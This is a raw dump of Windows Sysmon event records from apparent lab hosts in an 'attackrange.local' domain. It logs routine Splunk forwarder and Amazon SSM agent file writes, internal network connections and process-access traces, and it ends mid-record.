23542300x800000000000000082604Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:26.919{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4A5571608F0A33B2E747552C9143AD49,SHA256=03A7FC55DED98C8151DD4E5940ED8BDDDA20C1733FD8F7E92BE02F1495988CDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104768Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:27.858{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B95BC43E41CE37A661FEF8D315FA3A53,SHA256=8516FEB51279068B3FB65BCBC3599C8B79A8CD7AD56B10AA9F4B162B4D62E651,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082605Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:27.919{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=CE3D3D20F736E950A6B4C28EA83D888C,SHA256=65D4CBC2EC0E32A3BD4E433045575425D54725572D092544F60A7E4102B2C64D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104769Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:28.858{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2EE1372320DB9BC9867F1FDBC15ED45F,SHA256=ECA927368DB239E558621FD9471E3AD13B2FFF8BE7CD13EBF143F1B820844CC3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082606Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:28.919{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6F520E8A257A8F91181F0AAC10272B3F,SHA256=3CCC05A996D116ABF80C36195D60E486F644940CC3F056AAE8A3F5492F82DA8D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082608Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:29.919{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=185BEB737DE4BAD9945FEED4C91D5C03,SHA256=AE06F3FB785DBE32A2D5F9C052D7C0A18037A02BF36B44CBD0E6993ABA70866F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104771Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:29.858{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4B2D19F38D95A77E235A3E317EE382F6,SHA256=21FB87DF0F8A9E7C2EFE7DC3C982ABA452497609C942D2112A817B2BEAF3ED71,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000104770Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:27.315{58E9C193-ACC1-615A-6E00-00000000FC01}3516C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-639.attackrange.local51724-false10.0.1.12-8000- 23542300x800000000000000082607Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:29.763{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeC:\Program Files\SplunkUniversalForwarder\var\run\serverclass.xmlMD5=0DE8A333C5FD1740BE6882387E7A5A2B,SHA256=A5B175F730F9666E64AD37BBFDA51EEEB5E907D1D3D0F46F0AAC40581BD0C903,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104772Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:30.858{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=26665E74EB5134BEC9575A4BDC301259,SHA256=053D9E3EAFDF41615842FF3A91B440653B77BDECE556D5DAD1ADAC2AC8EACFF2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082610Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:30.935{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5ACA5FAA3FDEF7BFDC3B4295903AFFB5,SHA256=BF3EA606C3330422ACCC7A1539FAD8B37C5066F9BE3A99C8D1250691897F2CE0,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082609Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:28.707{2FDD8D40-ACA5-615A-6600-00000000FD01}2852C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50108-false10.0.1.12-8000- 23542300x8000000000000000104774Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:31.865{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5EC61145CC716FB3F3E74FAA9247AA4F,SHA256=08EFB7EEF824F79C1C8338196A2C26CAA661B5AABB7511DBF198C097A4ADB410,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082625Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:31.935{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C9642D7024DE7BCECFE8F571370060D1,SHA256=581FEF910411B392605985350679DBC4D11E4502F49D393E2BBB34604E76EC71,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104773Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:31.492{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\respondent-20211004072647-029MD5=53085563A3ABB9F3808759992432B215,SHA256=10E8415EFF195E3F3A29733AD6341E818F88D003F4EF1749654882A61D67B63B,IMPHASH=00000000000000000000000000000000falsetrue 354300x800000000000000082624Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:29.301{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-36.attackrange.local50109-false10.0.1.12-8089- 10341000x800000000000000082623Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:31.403{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B3EB-615A-7301-00000000FD01}1248C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082622Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:31.403{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082621Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:31.403{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082620Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:31.403{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082619Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:31.403{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082618Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:31.403{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082617Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:31.403{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082616Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:31.403{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082615Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:31.403{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082614Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:31.403{2FDD8D40-AC99-615A-0C00-00000000FD01}728888C:\Windows\system32\svchost.exe{2FDD8D40-AC9A-615A-1D00-00000000FD01}1920C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082613Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:31.403{2FDD8D40-AC98-615A-0500-00000000FD01}4121436C:\Windows\system32\csrss.exe{2FDD8D40-B3EB-615A-7301-00000000FD01}1248C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x800000000000000082612Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:31.403{2FDD8D40-AC9A-615A-1E00-00000000FD01}19483540C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{2FDD8D40-B3EB-615A-7301-00000000FD01}1248C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x800000000000000082611Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:31.404{2FDD8D40-B3EB-615A-7301-00000000FD01}1248C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{2FDD8D40-AC99-615A-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000082642Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:32.950{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B3D9EF1E52ECCD431E551E5DBBAA229,SHA256=1FA56171057677DD68AAD72C10380AE74BF1827EC61620C497FDCA6AA773F4AF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104777Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:32.909{58E9C193-ACC9-615A-7700-00000000FC01}2976NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A44F9A20ABE3B5DB2058B660E3C5DE3F,SHA256=DD07F568F86DA11735F981261E1409C0C407338D06DB3909FBC29740C63C511B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104776Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:32.476{58E9C193-ACB4-615A-2800-00000000FC01}2932NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-0820d8563ae6a39aa\channels\health\surveyor-20211004072645-030MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000104775Microsoft-Windows-Sysmon/Operationalwin-dc-639.attackrange.local-2021-10-04 07:57:32.099{58E9C193-ACA7-615A-1300-00000000FC01}880NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=C8D643876F0B4BEFB6EEDFF5131F9AA0,SHA256=2FA8EFF8CE7052D2EC68B044FE3269B76BE60CD922312F7E3A8BD90AEF3B581C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082641Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:32.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=A98662EED9B8832773BB9130085A0AEA,SHA256=297889B5676B75CEFB123E5C01A6D747E207750ED64DBA7970B81F44A5611ABC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000082640Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:32.638{2FDD8D40-ACAC-615A-7000-00000000FD01}3156NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=581854E7D70FDCC9BA04DDD4AC191170,SHA256=579CEEA04DFDC41B5623C035D9028096E62CDCA6B6F6C4B8B4904FF30BAA5276,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000082639Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:32.185{2FDD8D40-B3EC-615A-7401-00000000FD01}39123984C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{2FDD8D40-AC9A-615A-1E00-00000000FD01}1948C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082638Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 07:57:32.044{2FDD8D40-AC9B-615A-2B00-00000000FD01}28602880C:\Windows\system32\conhost.exe{2FDD8D40-B3EC-615A-7401-00000000FD01}3912C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000082637Microsoft-Windows-Sysmon/Operationalwin-host-36.attackrange.local-2021-10-04 